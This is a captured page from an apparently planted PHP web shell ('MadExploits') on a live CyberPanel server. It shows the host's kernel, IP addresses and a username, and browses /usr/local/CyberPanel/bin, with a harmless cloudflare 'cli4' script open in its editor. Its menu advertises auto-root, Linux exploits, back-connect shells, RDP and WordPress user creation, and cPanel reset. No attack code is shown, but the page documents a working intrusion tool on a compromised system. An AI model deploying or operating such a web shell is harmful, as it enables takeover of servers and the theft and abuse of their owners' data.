Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
CyberPanel /
bin /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
Activate.ps1
8.82
KB
-rw-r--r--
activate
1.96
KB
-rw-r--r--
activate.csh
928
B
-rw-r--r--
activate.fish
2.15
KB
-rw-r--r--
cli4
981
B
-rwxr-xr-x
django-admin
280
B
-rwxr-xr-x
dotenv
229
B
-rwxr-xr-x
fastapi
227
B
-rwxr-xr-x
google-oauthlib-tool
250
B
-rwxr-xr-x
jp.py
1.67
KB
-rwxr-xr-x
normalizer
250
B
-rwxr-xr-x
pip
238
B
-rwxr-xr-x
pip3
238
B
-rwxr-xr-x
pip3.10
238
B
-rwxr-xr-x
pyrsa-decrypt
229
B
-rwxr-xr-x
pyrsa-encrypt
229
B
-rwxr-xr-x
pyrsa-keygen
227
B
-rwxr-xr-x
pyrsa-priv2pub
250
B
-rwxr-xr-x
pyrsa-sign
223
B
-rwxr-xr-x
pyrsa-verify
227
B
-rwxr-xr-x
python
5.66
MB
-rwxr-xr-x
python3
5.66
MB
-rwxr-xr-x
python3.10
5.66
MB
-rwxr-xr-x
sqlformat
233
B
-rwxr-xr-x
tldextract
230
B
-rwxr-xr-x
uvicorn
228
B
-rwxr-xr-x
websockets
230
B
-rwxr-xr-x
wsdump
233
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cli4
#!/usr/local/CyberPanel/bin/python3 # EASY-INSTALL-ENTRY-SCRIPT: 'cloudflare==2.20.0','console_scripts','cli4' import re import sys # for compatibility with easy_install; see #2198 __requires__ = 'cloudflare==2.20.0' try: from importlib.metadata import distribution except ImportError: try: from importlib_metadata import distribution except ImportError: from pkg_resources import load_entry_point def importlib_load_entry_point(spec, group, name): dist_name, _, _ = spec.partition('==') matches = ( entry_point for entry_point in distribution(dist_name).entry_points if entry_point.group == group and entry_point.name == name ) return next(matches).load() globals().setdefault('load_entry_point', importlib_load_entry_point) if __name__ == '__main__': sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0]) sys.exit(load_entry_point('cloudflare==2.20.0', 'console_scripts', 'cli4')())
Close